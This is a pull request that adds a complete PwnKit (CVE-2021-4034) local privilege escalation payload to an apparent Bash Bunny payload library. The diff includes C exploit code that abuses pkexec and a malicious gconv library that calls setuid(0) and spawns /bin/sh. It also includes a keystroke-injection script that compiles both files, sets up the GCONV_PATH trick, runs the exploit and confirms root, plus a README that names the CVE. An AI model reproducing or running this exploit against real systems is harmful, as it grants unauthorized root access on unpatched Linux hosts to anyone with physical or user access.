### PR TITLE
Add "PwnKit Vulnerability" - LPE

### DIFF
--- a/payloads/library/execution/PwnKit_local-privilege-escalation/CVE-2021-4034_files/exploit.c
+++ b/payloads/library/execution/PwnKit_local-privilege-escalation/CVE-2021-4034_files/exploit.c
@@ -1,0 +1,21 @@
+#include <unistd.h>
+
+int main() {
+
+    char * const ARGUMENTS[] = {
+        NULL
+    };
+
+    char * const ENVIRONMENT[] = {
+        "pwnkit.so:.",
+        "PATH=GCONV_PATH=.",
+        "SHELL=PWNKIT",
+        "CHARSET=PWNKIT",
+        NULL
+    };
+
+    execve("/usr/bin/pkexec", ARGUMENTS, ENVIRONMENT);
+
+    return(0);
+
+}

--- a/payloads/library/execution/PwnKit_local-privilege-escalation/CVE-2021-4034_files/library.c
+++ b/payloads/library/execution/PwnKit_local-privilege-escalation/CVE-2021-4034_files/library.c
@@ -1,0 +1,24 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void gconv() {}
+
+void gconv_init() {
+
+    char * const ARGUMENTS[] = {
+        "/bin/sh",
+        NULL
+    };
+
+    char * const ENVIRONMENT[] = {
+        "PATH=/bin:/sbin:/usr/bin:/usr/sbin/",
+        NULL
+    };
+
+    setuid(0);
+    setgid(0);
+    execve(ARGUMENTS[0], ARGUMENTS, ENVIRONMENT);
+    exit(0);
+
+}

--- a/payloads/library/execution/PwnKit_local-privilege-escalation/README.md
+++ b/payloads/library/execution/PwnKit_local-privilege-escalation/README.md
@@ -1,0 +1,25 @@
+# PwnKit Vulnerability - Local Privilege Escalation
+
+- Title:         PwnKit Vulnerability - Local Privilege Escalation
+- Author:        TW-D
+- Version:       1.0
+- Target:        Linux
+- Category:      Execution      
+
+## Description
+
+The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration.
+
+[PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)
+
+## Configuration
+
+From "payload.txt" change the values of the following constant :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+
+```

--- a/payloads/library/execution/PwnKit_local-privilege-escalation/payload.txt
+++ b/payloads/library/execution/PwnKit_local-privilege-escalation/payload.txt
@@ -1,0 +1,112 @@
+#!/bin/bash
+#
+# Title:            PwnKit Vulnerability - Local Privilege Escalation
+#
+# Description:      
+#                   The Qualys Research Team has discovered a memory corruption 
+#                   vulnerability in polkit’s pkexec, a SUID-root program that 
+#                   is installed by default on every major Linux distribution.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Execution
+# Target:           Linux
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Ubuntu 20.04.3 LTS x86_64
+# pkexec version 0.105
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 7000
+RUN UNITY xterm
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING "cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/CVE-2021-4034_files/"
+Q ENTER
+Q DELAY 3500
+
+Q STRING "mkdir /tmp/pwnkit_lpe/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING "echo \"module UTF-8// PWNKIT// pwnkit 1\" > /tmp/pwnkit_lpe/gconv-modules"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "mkdir -p \"/tmp/pwnkit_lpe/GCONV_PATH=.\""
+Q ENTER
+Q DELAY 1500
+
+Q STRING "cp /usr/bin/true \"/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:.\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE4
+
+Q STRING "cd /tmp/pwnkit_lpe/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "/usr/bin/pkexec --version"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "./pwnkit"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "id"
+Q ENTER
+Q DELAY 1500
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0


### PR DESCRIPTION
The Qualys Research Team has discovered a memory corruption 
vulnerability in polkit’s pkexec, a SUID-root program that 
is installed by default on every major Linux distribution.